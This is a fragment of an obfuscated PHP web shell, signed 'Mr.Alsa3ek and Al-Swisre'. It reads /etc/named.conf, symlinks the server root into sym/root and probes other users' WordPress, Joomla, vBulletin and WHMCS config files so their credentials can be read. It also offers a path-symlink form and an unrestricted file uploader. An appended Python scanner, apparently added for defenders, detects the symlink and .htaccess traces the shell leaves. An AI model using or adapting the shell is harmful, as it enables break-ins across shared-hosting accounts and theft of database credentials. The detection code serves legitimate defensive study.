    $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
    $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
    $IIIIIIIII11l=$IIIIIIIII11I[0];
    $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
    $IIIIIIIIlIII=get_headers($IIIIIIIII111);
    $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
    $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
    $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
    $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
    $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
    $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
    $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
    $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
    $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
    $IIIIIIIIllIl=$IIIIIIIIllII[0];
    $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
    $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
    $IIIIIIIIllll=$IIIIIIIIlllI[0];
    $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
    $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
    $IIIIIIIIll1l=$IIIIIIIIll1I[0];
    $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
    $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
    $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
    $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
    $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
    $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
    $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
    $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
    $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
    $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
    $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
    $IIIIIIII1III=$IIIIIIIIl111[0];
    $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
    $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
    $IIIIIIII1IlI=$IIIIIIII1II1[0];
    $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
    $IIIIIIII1I1I=' ';
    if (strpos($IIIIIIIII11l,'200') == true )
    {
    $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
    }
    elseif (strpos($IIIIIIIIlIIl,'200') == true)
    {
    $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
    }
    elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
    }
    elseif (strpos($IIIIIIIIl1lI,'200')  == true)
    {
    $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
    }
    elseif (strpos($IIIIIIIIl11I,'200')  == true)
    {
    $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
    }
    elseif (strpos($IIIIIIIIlIll,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
    }
    elseif (strpos($IIIIIIIIlI1l,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
    }
    elseif (strpos($IIIIIIIIllIl,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
    }
    elseif (strpos($IIIIIIIIllll,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
    }
    elseif (strpos($IIIIIIIIll1l,'200')  == true)
    {
    $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
    }
    else
    {
    continue;
    }
    $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
    echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
    <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
    }
    }
    }
    }
    break;
    case 'sym':
    $IIIIIIIIIllI = @file('/etc/named.conf');
    if(!$IIIIIIIIIllI)
    {
    die (" can't read /etc/named.conf");
    }
    else
    {
    echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
    foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
    if(eregi('zone',$IIIIIIIIIll1)){
    preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
    flush();
    if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
    $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
    $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
    @symlink('/','sym/root');
    $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
    $IIIIIIII1I11 = '\.ir';
    $IIIIIIII1lII = '\.il';
    if (eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
    {
    $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
    }
    echo "
    <tr>
    
    <td>
    <div class='dom'><a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a> </div>
    </td>
    
    
    <td>
    '.$IIIIIIIII1I1['name']."
    </td>
    
    
    
    
    
    
    <td>
    <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
    </td>
    
    
    </tr></div> ";
    flush();
    }
    }
    }
    }
    break;
    case 'file':
    echo '
    The file path to symlink
    
    <br /><br />
    <form method="post">
    <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
    <input type="text" name="symfile" value="file.name_sym ( Ex. :: 1.txt )" size="60"/><br /><br />
    <input type="submit" value="symlink" name="symlink" /> <br /><br />
    
    
    
    </form>
    ';
    $IIIIIIII1lIl = $_POST['file'];
    $symfile = $_POST['symfile'];
    $symlink = $_POST['symlink'];
    if ($symlink)
    {
    @symlink("$IIIIIIII1lIl","sym/$symfile");
    echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
    }
    break;
    default:
    header("Location: $IIIIIIIIIlIl");
    }
    }else
    {
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == 'Upload') {
    if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<br /><br /><b>Uploaded successful !!<br><br>';}
    else {echo '<br /><br />Not uploaded !!<br><br>';}
    }
    echo '
    <br /><br /><div class="fot">Cod3d by Mr.Alsa3ek and Al-Swisre
    <br /><br />
    Muslims Hackers</div> ';
    }
    ;echo '
    
    </div>
    
    
    </body>
    
    </html>
    ';
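
From the defending side, the decoded script leaves two artifacts in the web root: a `sym/root` symlink pointing at `/`, and a `sym/.htaccess` that serves `.php` files as plain text. The scanner below is an added example, not part of the original post or of the decoded script; the function names, the account layout, and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Directives the decoded script writes to sym/.htaccess so that PHP files
# reached through the symlink are served as text instead of being executed.
SUSPICIOUS = [
    (re.compile(r"^\s*AddType\s+text/plain\s+.*\.php", re.I), "PHP served as text/plain"),
    (re.compile(r"^\s*Options\s+.*(\ball\b|\+?FollowSymLinks)", re.I), "Options enables symlink following"),
    (re.compile(r"^\s*Satisfy\s+Any", re.I), "Satisfy Any relaxes access control"),
]

def scan_docroot(docroot, account_home):
    """Return sorted (path, reason) findings for one hosting account (POSIX paths)."""
    home = os.path.realpath(account_home)
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                # A link is only acceptable if it resolves inside the account's own home.
                target = os.path.realpath(path)
                if os.path.commonpath([home, target]) != home:
                    findings.append((path, "symlink escapes account home -> " + target))
            elif name == ".htaccess":
                with open(path, errors="replace") as fh:
                    for line in fh:
                        for pattern, reason in SUSPICIOUS:
                            if pattern.search(line):
                                findings.append((path, reason))
    return sorted(findings)

def demo():
    """Build a constructed (hypothetical) account tree like the one the script leaves behind."""
    home = tempfile.mkdtemp(prefix="acct_")
    docroot = os.path.join(home, "public_html")
    os.makedirs(os.path.join(docroot, "sym"))
    os.makedirs(os.path.join(home, "shared"))
    os.symlink(os.path.join(home, "shared"), os.path.join(docroot, "assets"))  # benign link
    os.symlink("/", os.path.join(docroot, "sym", "root"))
    with open(os.path.join(docroot, "sym", ".htaccess"), "w") as fh:
        fh.write("Options all \n AddType text/plain .php \n Satisfy Any")
    return docroot, home, scan_docroot(docroot, home)

if __name__ == "__main__":
    for path, reason in demo()[2]:
        print(path, "|", reason)
```

The `.htaccess` half of this only works where the host lets accounts override `Options` per directory, which Apache controls with the `AllowOverride` directive.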